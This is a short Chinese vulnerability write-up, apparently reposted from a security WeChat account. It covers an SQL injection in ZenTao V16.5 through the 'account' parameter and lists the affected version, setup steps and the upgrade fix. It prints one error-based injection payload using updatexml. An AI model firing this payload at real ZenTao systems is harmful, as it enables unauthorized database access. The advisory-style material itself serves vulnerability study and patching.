上方蓝色字体关注我们,一起学安全!
作者:bnlbnf@Timeline Sec
本文字数:619
阅读时长:2~3min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负
0x01 简介
禅道由青岛易软天创网络科技有限公司开发,国产开源项目管理软件。
它集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整覆盖了研发项目管理的核心流程。
禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的API可以调用。
0x02 漏洞概述
禅道V16.5未对输入的account参数内容作过滤校验,导致攻击者拼接恶意SQL语句执行。
0x03 影响版本
禅道V16.5
0x04 环境搭建
下载一键安装包
https://www.zentao.net/download/zentaopms16.5-80656.html
启动,然后访问
0x05 漏洞复现
报错型注入payload:
admin' and updatexml(1,concat(0x7e,(123=123),0x7e),1) and '1'='1
0x06 修复方式
升级最新版本
https://www.zentao.net
参考链接:
https://www.cnblogs.com/spmonkey/articles/16611302.html
本文分享自 Timeline Sec 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!